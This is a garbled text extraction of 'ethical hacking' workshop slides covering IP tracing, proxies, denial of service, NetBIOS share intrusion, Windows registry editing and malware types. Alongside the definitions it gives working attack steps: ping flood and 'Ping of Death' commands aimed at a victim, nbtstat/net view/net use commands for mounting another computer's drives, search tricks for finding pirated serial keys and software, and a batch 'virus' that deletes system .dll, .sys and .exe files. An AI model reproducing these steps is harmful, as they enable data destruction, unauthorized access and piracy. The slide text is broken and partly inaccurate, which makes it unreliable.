Post on 29-May-2018
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 1/43
Information Security andEthical hacking
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 2/43
Internet Protocol(ip)Tracing ipDenial of services(DoS)SharingUnwanted AccessUsing proxies
Windows HackRegistry editingMulti yahooChanging names of
icons.Disabling features-
shutdown,restart etc.
Tips on Google surfingRapid share
viruses,trojans,worms
PhisersTools
Brutus-brute forcesWindows passwordBackdoor Entry
TrojansRemote employing monitors
Other malicious tools
Day 1 Day 2
Binders
Key loggingWindows passwordEtc..
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 3/43
Ethical Hacking
From E-commerce to information gathering and entertainment, the Internet hasevolved into a one-stop resource for both professional and personal purposes.
Unfortunately, the same Internet is also used by computer criminals to carry out cyber
crimes, such as identity theft and virus/worm/Trojan attacks, etc.
Ethical hackers are the sentinels of the Internet. Their work involves understandingthe mind of the cyber criminal, tracing and tracking his functioning, and innovatingnew strategies and methods to safeguard online activity.
Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing everyday, a career inthis field is also evolving into a professionally satisfying and monetarily lucrativeoption.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 4/43
WHO AREHACKERS?
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 5/43
WHO ARE HACKERS?
Anarchist HackersTheir sole intent on system infiltration is to cause damage or use information to
create havoc.
HackersThey don t particularly care about bragging about their accomplishments as it
exposes them to suspicion. They prefer to work from behind the scenes andpreserve their anonymity.
Crackers
This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 6/43
Ethical Hacker
Being able to attribute your attacks to the right type of attacker isvery important. By identifying your attacker to be either anAnarchist Hacker or a Hacker you get a better idea of what you reup against.
Know your enemy and know yourself and you will always bevictorious...
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 7/43
Ip Address
32 bits combination.Staticdynamic
own ip.Ipconfigwww.whatismyip.comwww.danasoft.com
server ip addressping www.anylan.innslookup www.anylan.inwww.whois.se
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 8/43
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 9/43
ip tracingtracert www.anylan.in
Tracing ip during chatting
Netstat nNetstat -a
Port 5050 or 5101
Tracing the ip locations
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 10/43
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 11/43
E-mail Headers
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 12/43
E-mail headers
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 13/43
E-mail Headers
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 14/43
Neo trace pro
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 15/43
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 16/43
Proxywww.russianproxy.com
www.kproxy.com
www.cooltunnel.com
www.mathtunnel.com
hidemyip
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 17/43
D oS Attack
Conceptually, DoS attacks are intended to prevent legitimateusers, customers or clients of a site from successfully accessingit.
Traditional DoS attacks have been aimed at consuming
resources or disrupting services at the network or operatingsystem level.Typical examples are server-based attacks such as SYN floods
and bandwidth exhaustion attacks that attempt to saturate thevictim¶s Internet connection with spurious traffic.
Death by overloading of system.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 18/43
DO S Attack
D enial O f Services
In a denial-of-service (D
oS) attack, an attacker attempts to prevent legitimate usersfrom accessing information or services. By targeting your computer and its networkconnection, or the computers and network of the sites you are trying to use, anattacker may be able to prevent you from accessing email, web sites, online accounts(banking, etc.), or other services that rely on the affected computer.
p ing [IP ADDRESS HERE or WEBSITE] -t -l 15000
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 19/43
D os & ddos
O versized Packets
This is called the "Ping of D eath" (ping -1 65510 192.168.2.3) an a Windows system
(where 192.168.2.3 is the IP adress of the intended victim). What is happening is theattacker is pinging every port on the victims computer causing it to echo back 65510requests.
The main goals of the "Ping of D eath" is to generate a packet size that exceeds 65,535bytes. Which can abrubtly cause the victim computer to crash.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 20/43
D os
Ping Attack
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 21/43
D oS
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 22/43
Symptoms O f D os
unusually slow network performance (opening files or accessing web sites)
unavailability of a particular web site
inability to access any web site
dramatic increase in the amount of spam you receive in your account
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 23/43
NetBios
Network Basic Input O utput System and is used as a way for computers in a LAN ora WAN (local network or internet/wider network) to share printers or drives.
WAN attack that will be more interesting for most of you guys, and it is the WANattack that will be more dangerous.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 24/43
Ste p s
Start up your terminal (Start > run > cmd). You will be given this prompt:C:\WINDO WS>make sure the host is alive:
C:\WINDO WS> ping 10.1.1.3If it is, you'll get something like this in response:Reply from 10.1.1.3: byte=32 time<1ms TTL=128
Which means your target is up.We then probe this target to see if it is sharing anything:
C:\WINDO WS> NBtSTAT -a 10.1.1.3HACKME-921J <00> UNIQUE Registered
MSHO ME <00> GRO UP RegisteredHACKME-921J <03> UNIQUE Registered
HACKME-921J <20> UNIQUE RegisteredMSHO ME <1E> GRO UP RegisteredHACKABLEUSER <03> UNIQUE RegisteredMSHO ME <1D > UNIQUE Registered<20>? That means that the target has files/folders/drives/etc. being shared on
that computer
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 25/43
C:\WINDO WS> NET VIEW \\10.1.1.3Which will hopefully give a response like this:
Shared resources on 10.1.1.3Share name Type Comment
--------------------------------------------C D isk
D D iskCommand completed successfully.
mount them locally:C:\WINDO WS> NET USE G: \\10.1.1.3\CCommand completed successfully.
go to "My Computer" and browse those files.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 26/43
serials
In the search field type: "Product name" 94FBR
Where, "Product Name" is the name of the item you want to find the serialnumber for.
94FBR is part of a O ffice 2000 Pro cd key that is widely distributed as it bypassesthe activation requirements of O ffice 2K Pro. By searching for the product nameand 94fbr, you guarantee two things.1) The pages that are returned are pages dealing specifically with the product
you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, youguarantee that any page being returned is a serial number list page.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 27/43
Unlimited Rapidshare download
go to temporary internet files folder and delete all the cookies related to rapidshare.
make a bat file and run it every timeipconfig /flushdnsipconfig /releaseipconfig /renewexit
turn off on ur modem
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 28/43
O ther google ways
Look for Appz in Parent D irectory
intext:"parent directory" intext:"[EXE]"
intext:"parent directory" index of:"[EXE]"
intext:"parent directory" index of:"[RAR]"
This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.
Look for Moviez in Parent D irectory
intext:"parent directory" intext:"[VI D ]"
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 29/43
intext:"parent directory" index of:"[VI D ]"
This will look for any video filetype in parent directory. You can optionaly addindex:"xvid" or intext:"divx" for specific codec movie.
Look for Muzik in Parent D irectory
intext:"parent directory" intext:"[MP3]"
intext:"parent directory" index of:"[MP3]"
This will look for any music files.
Look for Gamez in Parent D irectory
intext:"parent directory" index of:"[Gamez]"
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 30/43
RegistryThe Registry is a database used to store settings and options for the 32 bit
versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. Itcontains information and settings for all the hardware, software, users, andpreferences of the PC. Whenever a user makes changes to a Control Panelsettings, or File Associations, System Policies, or installed software, the
changes are reflected and stored in the Registry.The physical files that make up the registry are stored differently depending
on your version of Windows; under Windows 95 & 98 it is contained in twohidden files in your Windows directory, called USER.DAT and SYSTEM.DAT,for Windows Me there is an additional CLASSES.DAT file, while under
Windows NT/2000 the files are contained seperately in the%SystemRoot%\System32\Config directory. You can not edit these filesdirectly, you must use a tool commonly known as a "Registry Editor" to makeany changes (using registry editors will be discussed later in the article).
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 31/43
The Registry has a hierarchal structureThere are six main branches, each containing a specific portion of the
information stored in the Registry. They are as follows:
* HKEY_CLASSES_ROOT - This branch contains all of your file associationmappings to support the drag-and-drop feature, OLE information, Windowsshortcuts, and core aspects of the Windows user interface.
* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERSappropriate for the user currently logged onto the PC and cont ai ns inform a tion such a s logon n a mes, d esktop sett ings, a n d S ta rt menu sett ings.
* HKEY_LOCAL_MACHINE - This branch cont ai ns computer spec if ic inform a tion ab out the type of h a r dwa re, soft wa re, a n d other preferences on a g iven PC , this information is used for all users who log onto this computer.
* HKEY_USERS - This branch cont ai ns in divid u al preferences for e a ch user of the computer , each user is represented by a SID sub-key locatedunder the main branch.
* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current h a r dwa re conf igur a tion.
* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use wi th the Pl ug-&- Play fe a tures of Win d o w s, th is sect ion is dy m a n ic a n d will ch a nge a s d e vices a re add e da n d remo ve d from the s ystem.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 32/43
Each registry value is stored as one of five main data types:
* REG_BINARY - This type stores the value as raw bi n a r y da ta . Most
hardware component information is stored as binary data, and can be displayedin an editor in hexadecimal format.* REG_DWORD - This type represents the data by a four by te num b er and is
commonly used for b oo le a n val ues , such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, andcan be displayed in REGEDT32 in binary, hexadecimal and decimal format, or
in REGEDIT in hexadecimal and decimal format.* REG_EXPAND_SZ - This type is an exp a n dabl e da ta str ing that is stringcontaining a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced bythe actual location of the directory containing the Windows NT system files.(This type is only available using an advanced registry editor such asREGEDT32)
* REG_MULTI_SZ - This type is a mu ltip le str ing used to represent valuesthat contain lists or multiple values, each entry is separated by a NULLcharacter. (This type is only available using an advanced registry editor such asREGEDT32)
* REG_SZ - This type is a st a n da r d str ing , used to represent human readabletext values.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 33/43
Playing With RegistryTake backup of the registry
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]"SetupType"=dword:00000000"CmdLine"="setup -newsetup""SystemPrefix"=hex:c5,0b,00,00,00,40,36,02
Deleting the key values[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]
Use this feature with care, as deleting the wrong key or value could causemajor problems within the registry, so remember to always make a backupfirst.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 34/43
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 35/43
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoClose"="1³
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:03ffffff $[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Winlogon]
"LegalNoticeCaption"="Caption here."
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 36/43
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 37/43
Multiple yahoo login
Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.
On the right page, right-click and choose new Dword value.
Rename the value to Plural.
Double click and assign a decimal value of 1
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 38/43
Viruses , Worms and Trojans
Types of virusesThere are many type of viruses. Typical viruses are simply programs or scriptsthat will do various damage to your computer, such as corrupting files, copyingitself into files, slowly deleting all your hard drive etc.
WormsWorms are different type of viruses, but the same idea, but they are usuallydesigned to copy themselves a lot over a network and usually try to eat up asmuch bandwidth as possible by sending commands to servers to try to get in.
TrojansTrojans are another type of virus. They are simply like a server in which enableshackers to get into and control the computer. A trojan such as Subseven canenable a hacker to do various things such as control the mouse, eject the cd-romdrive, delete/download/upload files and much more.
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 39/43
Viruses , Worms and Trojans
MBR virusesBoot sector viruses are another type, they are similar to file viruses, but insteadthey go in the boot sector and can cause serious damage when the computer isbooted, some can easily format your drive simply by booting your computer.These are hard to remove.
.exe .com .bat .scr .pif .vbs
E-mail,p2p
the main thing to watch out for is the file size.
Icons,binders
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 40/43
Making a virus
This virus is indetectible by antivirus scanners.open notepad and past this code:
Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.
Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe
www.informationsecurityclub.com
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 41/43
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 42/43
Vbs-vb script
www.informationsecurityclub.com
onclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")
8/8/2019 Workshop Day1
http://slidepdf.com/reader/full/workshop-day1 43/43
crash
www.informationsecurityclub.com
StartStartStartStart